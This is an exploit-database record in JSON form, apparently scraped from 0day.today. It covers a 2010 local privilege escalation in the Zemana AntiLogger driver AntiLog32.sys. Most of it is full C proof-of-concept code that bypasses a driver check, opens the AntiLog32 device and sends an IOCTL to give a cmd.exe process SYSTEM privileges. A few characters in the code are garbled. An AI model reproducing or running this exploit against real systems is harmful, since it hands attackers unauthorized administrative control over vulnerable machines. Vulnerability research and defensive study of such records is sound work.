Description
Exploit for windows platform in category local exploits
{"id": "1337DAY-ID-13499", "type": "zdt", "bulletinFamily": "exploit", "title": "Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation", "description": "Exploit for windows platform in category local exploits", "published": "2010-07-28T00:00:00", "modified": "2010-07-28T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/13499", "reporter": "th_decoder", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-03-19T17:10:37", "viewCount": 4, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "sourceHref": "https://0day.today/exploit/13499", "sourceData": "=======================================================================\r\nZemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation\r\n=======================================================================\r\n\r\n\r\nZemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation Vulnerability\r\n \r\nVULNERABLE PRODUCTS\r\nZemana AntiLogger <=1.9.2.2.206\r\n \r\nDETAILS:\r\nAntiLog32.sys create a device called \\Device\\AntiLog32 , and handles DeviceIoControl request IoControlCode = 0x8000201C , which can elevate the privilege of a process to another process\r\n \r\nEXPLOIT CODE:\r\n \r\n#include \"stdafx.h\"\r\n#include \"windows.h\"\r\n#include \"winioctl.h\"\r\n#define IOCTL_IMPERSONATE_PROCESS CTL_CODE(0x8000 , 0x807 , METHOD_BUFFERED , FILE_ANY_ACCESS)\r\n \r\ntypedef struct _IMPERSONATE_PROCESS{\r\n HANDLE ImpersonateProcess ;\r\n HANDLE SystemProcess ;\r\n}IMPERSONATE_PROCESS , *PIMPERSONATE_PROCESS;\r\n \r\nint main(int argc, char* argv[])\r\n{\r\n printf(\"Zemana AntiLogger <=1.9.2.2.206 AntiLog32.sys <= 1.5.2.755\\n\"\r\n \"Local Privilege Escalation Vulnerability Proof-of-Concept\\n\"\r\n \"2010-7-28\\n\"\r\n \"By MJ0011 [email\u00a0protected]\\n\\nPress Enter\\n\");\r\n getchar();\r\n \r\n //bypass some useless create check\r\n \r\n PIMAGE_DOS_HEADER pdoshdr = (PIMAGE_DOS_HEADER)GetModuleHandle(NULL);\r\n PIMAGE_NT_HEADERS pnthdr = (PIMAGE_NT_HEADERS)((ULONG)pdoshdr + pdoshdr->e_lfanew);\r\n PVOID waddr = &pnthdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress ;\r\n \r\n ULONG oldp ;\r\n \r\n VirtualProtect(waddr , sizeof(ULONG) , PAGE_READWRITE , &oldp);\r\n pnthdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress = 0x1 ;\r\n VirtualProtect(waddr , sizeof(ULONG) , oldp , &oldp);\r\n \r\n \r\n HANDLE hdev = CreateFile(\"\\\\\\\\.\\\\AntiLog32\" ,\r\n FILE_READ_ATTRIBUTES ,\r\n FILE_SHARE_READ ,\r\n 0,\r\n OPEN_EXISTING ,\r\n 0,0);\r\n \r\n if (hdev == INVALID_HANDLE_VALUE)\r\n {\r\n printf(\"cannot open device %u\\n\" , GetLastError());\r\n getchar();\r\n return 0;\r\n \r\n }\r\n \r\n STARTUPINFOA sia ;\r\n memset(&sia , 0 , sizeof(sia));\r\n sia.cb = sizeof(sia);\r\n PROCESS_INFORMATION pi ;\r\n memset(? , 0 , sizeof(pi));\r\n \r\n \r\n \r\n if (!CreateProcess(\"c:\\\\windows\\\\system32\\\\cmd.exe\" ,\r\n NULL ,\r\n NULL,\r\n NULL,\r\n FALSE ,\r\n CREATE_SUSPENDED,\r\n NULL,\r\n NULL,\r\n &sia ,\r\n ?))\r\n {\r\n printf(\"cannot run cmd.exe....%u\\n\", GetLastError());\r\n getchar();\r\n return 0 ;\r\n }\r\n \r\n \r\n IMPERSONATE_PROCESS ip ;\r\n ip.ImpersonateProcess = (HANDLE)pi.dwProcessId ;\r\n ip.SystemProcess = (HANDLE)4 ; //// WinXP and later\r\n ULONG btr ;\r\n \r\n if (!DeviceIoControl(hdev , IOCTL_IMPERSONATE_PROCESS , &ip , sizeof(ip) , NULL , 0 , &btr, 0))\r\n {\r\n printf(\"cannot impersonate process %u\\n\" , GetLastError());\r\n getchar();\r\n return 0 ;\r\n }\r\n \r\n ResumeThread(pi.hThread);\r\n \r\n printf(\"OK\\n\");\r\n \r\n \r\n return 0;\r\n}\r\n \r\n================================\r\n\r\n\n\n# 0day.today [2018-03-19] #", "_state": {"dependencies": 1645245363, "score": 1659766679}}
{}